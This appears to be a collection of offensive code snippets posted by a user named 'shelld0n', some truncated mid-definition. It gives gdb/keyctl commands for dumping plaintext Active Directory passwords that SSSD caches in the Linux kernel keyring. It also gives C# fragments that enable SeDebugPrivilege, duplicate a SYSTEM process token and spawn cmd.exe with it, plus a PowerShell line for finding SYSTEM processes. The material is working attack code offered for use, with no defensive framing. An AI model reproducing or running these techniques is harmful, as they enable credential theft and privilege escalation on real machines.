shelld0n

for who ever this interest, if you enable krb5_store_password_if_offline   in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring
to dump the clear text password you can do :

```
gdb -p <PID_OF_SSSD>
call system("keyctl show > /tmp/output")
```

From the /tmp/output locate the key_id for the user you want
Example of an output is : 

shelld0n

// Duplicate token and spawn a new cmd.exe process
myAPI.SECURITY_IMPERSONATION_LEVEL seImpersonateLevel = myAPI.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation;
myAPI.TOKEN_TYPE tokenType = myAPI.TOKEN_TYPE.TokenPrimary;
IntPtr pNewToken = new IntPtr();
myAPI.SECURITY_ATTRIBUTES sec_att = new myAPI.SECURITY_ATTRIBUTES();
if (!myAPI.DuplicateTokenEx(tokenHandle, myAPI.TOKEN_ALL_ACCESS, ref sec_att, seImpersonateLevel, tokenType, out pNewToken)) { Console.WriteLine("Can't Adjust access Token"); Environment.Exit(2); };
myAPI.STARTUPINFO si = new myAPI.STARTUPINFO();
myAPI.PROCESS_INFORMATION pi;
bool ret;
ret = myAPI.CreateProcessWithTokenW(pNewToken, myAPI.LogonFlags.NetCredentialsOnly, "C:\\Windows\\System32\\cmd.exe", null, myAPI.CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi);

shelld0n

public enum LogonFlags
{
  WithProfile = 1,
  NetCredentialsOnly
}

public enum CreationFlags
{
  DefaultErrorMode = 0x04000000,
  NewConsole = 0x00000010,

shelld0n

// Duplicate Tokens for system process and store them in tokenHandle 
Console.WriteLine("your journey just started");
IntPtr test = myAPI.OpenProcess(myAPI.ProcessAccessFlags.QueryInformation, true, pid);
if (test == IntPtr.Zero) Console.WriteLine("No Handle to process !");
IntPtr tokenHandle;
bool result_token = myAPI.OpenProcessToken(test, myAPI.TOKEN_READ | myAPI.TOKEN_IMPERSONATE | myAPI.TOKEN_DUPLICATE, out tokenHandle);
Console.WriteLine(result_token);
//End of getting the handle of token of SYSTEM process

shelld0n

// see http://www.pinvoke.net/default.aspx/kernel32/OpenProcess.html
[Flags]
public enum ProcessAccessFlags : uint
{
  All = 0x001F0FFF,
  Terminate = 0x00000001,
  CreateThread = 0x00000002,
  VirtualMemoryOperation = 0x00000008,
  VirtualMemoryRead = 0x00000010,
  VirtualMemoryWrite = 0x00000020,

shelld0n

// see https://www.pinvoke.net/default.aspx/advapi32.openprocesstoken
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY = 0x0008;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;

shelld0n

// Enable SeDebugPrivilege Routine
string Privilege = "SeDebugPrivilege";
myAPI.LUID luid = new myAPI.LUID();
IntPtr hProcess = myAPI.GetCurrentProcess();
IntPtr hToken;
if (!myAPI.OpenProcessToken(hProcess, myAPI.TOKEN_QUERY | myAPI.TOKEN_ADJUST_PRIVILEGES, out hToken)) { Console.WriteLine("No tokens for current process"); Environment.Exit(2); };
if (!myAPI.LookupPrivilegeValue(null, Privilege, out luid)) { Console.WriteLine("No handle for privilege"); Environment.Exit(2); };
myAPI.LUID_AND_ATTRIBUTES luAttr = new myAPI.LUID_AND_ATTRIBUTES { Luid = luid, Attributes = myAPI.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED };
myAPI.TOKEN_PRIVILEGES tp = new myAPI.TOKEN_PRIVILEGES { PrivilegeCount = 1, Privileges = new myAPI.LUID_AND_ATTRIBUTES[1] };
tp.Privileges[0] = luAttr;

shelld0n

// Luid Structure Definition
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public Int32 HighPart;
}

[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES

shelld0n

Get-Process -IncludeUserName | Where-Object {$_.USERNAME -Like '*SYSTEM*'} | select ProcessName, Id, Handles

shelld0n

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;

namespace Token
{
    class Program